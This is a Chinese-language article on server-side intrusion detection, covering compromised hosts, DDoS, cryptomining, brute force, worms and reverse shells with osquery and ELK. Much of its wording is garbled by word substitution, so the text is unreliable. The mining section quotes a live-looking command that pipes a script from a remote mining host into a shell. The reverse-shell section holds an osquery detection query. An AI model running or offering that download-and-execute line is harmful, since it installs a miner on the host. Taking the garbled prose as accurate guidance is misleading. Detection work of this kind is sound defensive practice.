态势感知——服务器安全策略探索

 0x00、营业需求

企业IT架构数字化转型的大潮中，每每谋面对各类百般的安详威胁，包罗：体系和应用软件裂痕操作进攻，APT进攻，数据泄漏，云处事器滥用，DDoS进攻等。同时为了应对速率越来越快的收集犯法进攻，以及针对性进攻的多态化。为我们安详职员提出了更高的要求。

在做应急相应安详变乱进程的进程中，确认进攻陈迹一样平常从以下几个方面：

0x01、处事器安详告警

在态势感知产物中，，在处事器上陈设EDR终端是一个很好的处事器安详量化的一个进程。由于我们在处事器上可以网络历程、端口、账号、软件以及文件目次基本的安详数据。通过这些基本数据通事靠山大数据说明加工形成我们感知到威胁。

本篇首要从处事器端做检测，处事器端检测有以下上风：

• 纯真的收集层威胁检测无法和终端数据联动，形成的证据链可信度低。
• 加密毗连，通过SSL的bash反连等，无法通过收集检测，必要深度进修检测，检测本钱过高。
• threat hunting需求，可以更深入观测，包罗获取恶意措施。

那么我们先从入侵举动说明开始：

• 失陷主机

检测思绪：必要网络处事器端基本数据： 及时收集毗连数据，同时必要贸易威胁谍报数据源。

及时收集毗连数据，尝试情形搭建：通过kolide+osquery+ElasticSearch+kibana。

实现步调：

1、从处事器端获取基本外联收集数据。

2、通过flink可能spark streaming做及时Top历程、Top外联IP统计，说明全部处事器上传的外联孤岛数据，也可以编辑法则重点监控下载应用措施，可能下载对端的应用假如是HFS处事。必要重点存眷。虽然这里可以玩的playbook许多，必要用户本身发掘。

3、从中获取到应有措施路径、对外毗连IP信息，以及端口。通过IP地点查询威胁谍报，假如对端IP地点行使的C2、Tor、VPN、SS等地点视为失陷主机。态势感知——处事器安详计策试探

• 对外可疑毗连

检测思绪：这里首要是增进内容特性，好比说：上传装备根基信息、发送进攻指令、获取公网IP地点、黑客进攻毗连等。处事器端必要把恶意措施上传云查杀可能云沙箱做深入检测。

尝试情形：Malice（支持Yara+多杀毒引擎集成+virustotal）+ClamAV +ElasticSearch+kibana。

IDS检测法则完美：

虽然必要一个安详Team维护这个法则。

检测流程：

1、通过IDS检测到对外毗连。

2、通过收集通信历程关联到文件。

3、上传文件到云查杀体系中检测。假如发明病毒告警。

• 对外DDoS

检测思绪：通过获取及时历程快照，收集对外毗连快照，收集层获取其流量信息，同时也上传对应的历程文件到云查杀和云沙箱检测。在收集层检测通过IDS法则检测到对外DDoS进攻最多为：NTP反射进攻、memcache反射进攻。可是在处事器端检测会发明更多进攻方法，譬喻：CC进攻、SIP协议进攻、视频协议进攻、SYN Flood、ACK Flood等。虽然必要客户端抓包进一步确认。

检测流程：

1、获取历程快照，收集对外毗连快照，对外毗连收集流量（必要驱动支持）可能获取总流量。

2、执行抓包措施，收罗处事器端Pcap包，上传Pcap包样本随处事器端。

3、通过各类DDoS进攻法则过滤，假如发明预定的进攻范例。

• 挖矿检测

检测思绪：特性是CPU占用率过高。通过上传历程快照，同时获取相同top呼吁CPU占用率信息。可以确定挖矿历程。虽然尚有 /bin/sh -c /usr/bin/curl -sL https://xmr.tgywl.cn|sh 直接挖矿。

检测流程：

1、获取历程快照，CPU占用率信息。

2、多次CPU占率过高的历程聚合。

3、上传文件到云查杀体系中检测。假如发明病毒告警。

4、复查各个端口被入侵的陈迹，假如发生以下进攻告警，必要大数据关联说明（flink or spark streaming）。

• 对外爆破

检测思绪：关联收集层检测和处事器端检测相干历程。

检测流程：

1、获取历程快照，对外收集毗连快照。

2、获取收集层面各类协议的暴力破解告警。

3、行使flink or spark streaming 做大数据关联说明。

• 蠕虫病毒

检测思绪：假如存在对外扫描成果，通过大数据说明收集毗连，短时刻内过多毗连视为可疑。

检测流程：

1、获取历程快照，对外收集毗连快照。

2、获取收集层面临外可疑毗连告警。

3、上传文件到云查杀体系中检测。进一步说明，发明病毒标志为蠕虫病毒告警。

• 反弹shell

检测思绪：sh可能bash运行打开长途毗连，视为反弹shell。

检测流程：

1、获取历程快照，对外收集毗连快照。

2、查询语句。

"behavioral_reverse_shell": { 
      "query" : "SELECT DISTINCT(processes.pid), processes.parent, processes.name, processes.path, processes.cmdline, processes.cwd, processes.root, processes.uid, processes.gid, processes.start_time, process_open_sockets.remote_address, process_open_sockets.remote_port, (SELECT cmdline FROM processes AS parent_cmdline WHERE pid=processes.parent) AS parent_cmdline FROM processes JOIN process_open_sockets USING (pid) LEFT OUTER JOIN process_open_files ON processes.pid = process_open_files.pid WHERE (name='sh' OR name='bash') AND remote_address NOT IN ('0.0.0.0', '::', '') AND remote_address NOT LIKE '10.%' AND remote_address NOT LIKE '192.168.%';", 
      "interval" : 600, 
      "description" : "Find shell processes that have open sockets" 
    }, 

• rootkit检测

（编辑：河北网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!